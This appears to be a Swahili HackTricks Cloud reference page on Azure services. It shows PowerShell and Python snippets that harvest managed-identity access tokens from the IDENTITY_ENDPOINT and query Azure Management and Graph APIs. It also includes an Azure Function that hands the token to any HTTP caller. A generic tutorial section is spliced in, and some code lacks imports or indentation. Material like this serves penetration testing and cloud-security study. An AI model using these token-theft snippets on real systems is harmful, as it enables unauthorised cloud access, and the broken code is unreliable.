Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

Az - Services

Support HackTricks

Portals

Unaweza kupata orodha ya Microsoft portals katika https://msportals.io/

Raw requests

Azure API kupitia Powershell

Pata access_token kutoka IDENTITY_HEADER na IDENTITY_ENDPOINT: system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');.

Kisha uliza Azure REST API kupata subscription ID na zaidi.

$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

# List resources and check for runCommand privileges
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'

Azure API via Python Version

Mahitaji

  • Akaunti ya Azure

  • Azure CLI imewekwa na kusanidiwa

  • Python 3.x imewekwa

  • requests maktaba ya Python imewekwa (pip install requests)

Hatua za Kufuatilia

  1. Sanidi Mazingira ya Azure:

    • Ingia kwenye akaunti yako ya Azure kwa kutumia Azure CLI:

      az login

  2. Pata Kitambulisho cha OAuth2:

    • Pata kitambulisho cha OAuth2 kwa kutumia amri ifuatayo:

      az account get-access-token --resource=https://management.azure.com/

  3. Fanya Ombi la API:

    • Tumia Python kufanya ombi la API kwa kutumia kitambulisho cha OAuth2:

      import requests

# Badilisha na kitambulisho chako cha OAuth2
token = 'YOUR_OAUTH2_TOKEN'

# URL ya API unayotaka kufikia
url = 'https://management.azure.com/subscriptions?api-version=2020-01-01'

# Vichwa vya ombi
headers = {
    'Authorization': f'Bearer {token}',
    'Content-Type': 'application/json'
}

# Fanya ombi la GET
response = requests.get(url, headers=headers)

# Angalia majibu
print(response.json())

Hitimisho

Kwa kufuata hatua hizi, unaweza kufikia Azure API kwa kutumia Python. Hii ni muhimu kwa automatisering na usimamizi wa rasilimali za Azure.

IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']

print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

au ndani ya Kazi ya Python:

import logging, os
import azure.functions as func

def main(req: func.HttpRequest) -> func.HttpResponse:
logging.info('Python HTTP trigger function processed a request.')
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
return func.HttpResponse(val, status_code=200)

Orodha ya Huduma

Kurasa za sehemu hii zimepangwa kwa huduma za Azure. Humo utaweza kupata taarifa kuhusu huduma (jinsi inavyofanya kazi na uwezo wake) na pia jinsi ya kuorodhesha kila huduma.

Support HackTricks
PreviousAz - Password SprayingNextAz - ACR

Last updated